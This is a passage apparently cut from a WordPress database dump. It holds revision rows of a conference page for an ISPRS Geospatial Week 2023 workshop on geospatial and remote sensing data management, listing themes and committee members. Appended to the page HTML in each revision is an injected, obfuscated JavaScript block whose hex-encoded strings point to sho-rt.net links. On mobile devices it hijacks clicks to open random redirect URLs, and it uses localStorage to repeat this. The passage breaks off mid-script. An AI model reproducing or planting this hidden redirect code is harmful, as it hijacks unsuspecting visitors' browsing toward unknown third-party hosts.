Budapest University of Technology and Economics, Hungary</li>\n<li>Paul Vincent Kuper, Karlsruhe Institute of Technology, Germany</li>\n<li>Bassem Mokhtar, Egypt-Japan University of Science and Technology, Egypt</li>\n<li>Morakot Pilouk, ESRI, Singapore</li>\n<li>Jacynthe Pouliot, Laval University, Canada</li>\n<li>Alias Abdol Ramhan, University Technology Malaysia, Malaysia</li>\n<li>Friederike Reitze, Karlsruhe Institute of Technology, Germany</li>\n<li>Norbert Rösch, Karlsruhe Institute of Technology, Germany</li>\n<li>Emmanuel Stefanakis, University of Calgary, Canada</li>\n<li>Gyorge Szabo, Budapest University of Technology and Economics, Hungary</li>\n<li>Rami Zewail, Egypt-Japan University of Science and Technology, Egypt</li>\n<li>Sisi Zlatanova, University of New South Wales, Australia</li>\n<li>Hussein M. Abdulmuttalib, Dubai Municipality, United Arab Emirates</li>\n</ul>\n<p>&nbsp;</p>\n<h5><u>Supporting ISPRS <strong>Working</strong> Groups:</u></h5>\n<p>To be confirmed by the following and other possible WGs:</p>\n<ul>\n<li>WG II/4 “AI / ML for Geospatial Data”</li>\n<li>WG IV/2 “Artificial Intelligence and Uncertainty Modeling in Spatial Analysis”</li>\n<li>WG IV/3 “Geo-Computation and Geo-Simulation”</li>\n<li>WG IV/9 “Spatially  Enabled Urban and Regional Digital Twins”</li>\n</ul>\n<p>&nbsp;</p>\n<h5><u><strong>Publication of the workshop contributions:</strong> </u></h5>\n<p>Accepted full papers and extended abstracts will appear at ISPRS Annals and ISPRS Archives, respectively, dedicated to this symposium after the peer-review process.[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Advanced Data Preparation and Data Management for Geospatial and Remote Sensing Scenarios</strong>','','inherit','closed','closed','','2993-revision-v1','','','2022-11-04 20:47:46','2022-11-04 20:47:46','',2993,'https://gsw2023.com/?p=3006',0,'revision','',0),
(3007,1,'2022-11-04 20:49:50','2022-11-04 20:49:50','<p>[vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong>Advanced Data Preparation and Data Management for Geospatial and Remote Sensing Scenarios</strong></h4>\n<h5 style=\"text-align: center;\"><em>Joint workshop of ISPRS WG IV/4 “Data Management for Spatial Scenarios” and ICWG III/IVb “Remote Sensing Data Quality”</em></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3005\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: black;\">Today’s geospatial and remote sensing scenarios usually require the fusion of geometric, topological, and semantic data from a broad range of sources such as IoT and UAV sensors, mobile devices, BIM, GIS, digital twins, traffic simulations, and Smart Cites. Existing methods for preparation, modelling, and management of these data often cause a significant burden in data analysis processes. It is widely recognized that new advances in geospatial data preparation and management can accelerate the production of analysis-ready data and unlock the power of geospatial analytics. This workshop provides a platform to discuss new ways and best practices to prepare, model, and manage multi-dimensional geospatial and remote sensing data for static and (near) real-time applications. Contributions from academia and industry demonstrating innovative methods and tools, practical approaches, or research in progress are all welcome. The workshop will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with a number of related workshops. The event is a one-day single-track workshop of oral presentations and poster/networking sessions in the context of the ISPRS Geospatial Week 2023.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"55\" css_dt_team_masonry=\".vc_custom_1667594985833{margin-top: 5px !important;}\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>Data Accessibility for Smart Cities and Remote Sensing</li>\n<li>Data Preparation for Geospatial or Remote Sensing Applications</li>\n<li>Data Management for Geospatial or Remote Sensing Applications</li>\n<li>AI Methods to support Geospatial and Remote Sensing Data Preparation or Data Management</li>\n<li>Database Support for Convolutional Neural Networks and Image Classification</li>\n<li>Multi-Dimensional (3D/4D/nD) Geospatial Data Modelling and Management</li>\n<li>nD Data Cubes</li>\n<li>Big Geospatial Data: Preparation, Modelling and Management</li>\n<li>Spatio-Temporal and Trajectory Data Management</li>\n<li>Geospatial Data Streaming and Data Management for Geo-Sensor Networks</li>\n<li>Data Management for Real-Time Scenarios such as Traffic Simulation and Smart Cities</li>\n<li>Data Integration for Building Information Models (BIM) and 3D GIS</li>\n<li>Advanced Data Management Applications: Smart Environment/Cities, Digital Twins, Intelligent Transportation, Convolutional Neural Networks and Image Classification in Remote Sensing</li>\n<li>Internet of Vehicles (IOV) and Intelligent Transportation Systems (ITS)</li>\n<li>Geospatial Data Monetization</li>\n<li>Quality Aspects of Remote Sensing Data Operations (preparation, modelling, management, uncertainty)</li>\n<li>Remote Sensing for Better Future, Data Management and Quality Aspects of Environmental Monitoring including Biodiversity Analysis</li>\n</ul>\n<h5><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>Mulhim Al-Doori, Roads and Transport Authority, United Arab Emirates</li>\n<li>Arpad Barsi, Budapest University of Technology and Economics, Hungary</li>\n<li>Mike Batty, University College London, United Kingdom</li>\n<li>Peter Baumann, Jacobs University, Germany</li>\n<li>Filip Biljecki, National University of Singapore, Singapore</li>\n<li>Thomas Blaschke, Paris Lodron University Salzburg, Austria</li>\n<li>Patrick Bradley, Karlsruhe Institute of Technology, Germany</li>\n<li>Martin Breunig, Karlsruhe Institute of Technology, Germany</li>\n<li>Christophe Claramunt, Naval Academy Research Institute, France</li>\n<li>Volker <a href=\"mailto:alias@utm.my\">Coors,</a> HFT <em>Stuttgart<strong>, </strong></em>Germany</li>\n<li>Ihab Hamzi Hijazi, Technische Universität München, Germany</li>\n<li>Umit Isikdag, Istanbul Technical University, Turkey</li>\n<li>Mojgan A. Jadidi, York University, Canada</li>\n<li>Markus Jahn, Karlsruhe Institute of Technology, Germany</li>\n<li>Zsófia Kugler, Budapest University of Technology and Economics, Hungary</li>\n<li>Paul Vincent Kuper, Karlsruhe Institute of Technology, Germany</li>\n<li>Bassem Mokhtar, Egypt-Japan University of Science and Technology, Egypt</li>\n<li>Morakot Pilouk, ESRI, Singapore</li>\n<li>Jacynthe Pouliot, Laval University, Canada</li>\n<li>Alias Abdol Ramhan, University Technology Malaysia, Malaysia</li>\n<li>Friederike Reitze, Karlsruhe Institute of Technology, Germany</li>\n<li>Norbert Rösch, Karlsruhe Institute of Technology, Germany</li>\n<li>Emmanuel Stefanakis, University of Calgary, Canada</li>\n<li>Gyorge Szabo, Budapest University of Technology and Economics, Hungary</li>\n<li>Rami Zewail, Egypt-Japan University of Science and Technology, Egypt</li>\n<li>Sisi Zlatanova, University of New South Wales, Australia</li>\n<li>Hussein M. Abdulmuttalib, Dubai Municipality, United Arab Emirates</li>\n</ul>\n<p>&nbsp;</p>\n<h5><u>Supporting ISPRS <strong>Working</strong> Groups:</u></h5>\n<p>To be confirmed by the following and other possible WGs:</p>\n<ul>\n<li>WG II/4 “AI / ML for Geospatial Data”</li>\n<li>WG IV/2 “Artificial Intelligence and Uncertainty Modeling in Spatial Analysis”</li>\n<li>WG IV/3 “Geo-Computation and Geo-Simulation”</li>\n<li>WG IV/9 “Spatially  Enabled Urban and Regional Digital Twins”</li>\n</ul>\n<p>&nbsp;</p>\n<h5><u><strong>Publication of the workshop contributions:</strong> </u></h5>\n<p>Accepted full papers and extended abstracts will appear at ISPRS Annals and ISPRS Archives, respectively, dedicated to this symposium after the peer-review process.[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return 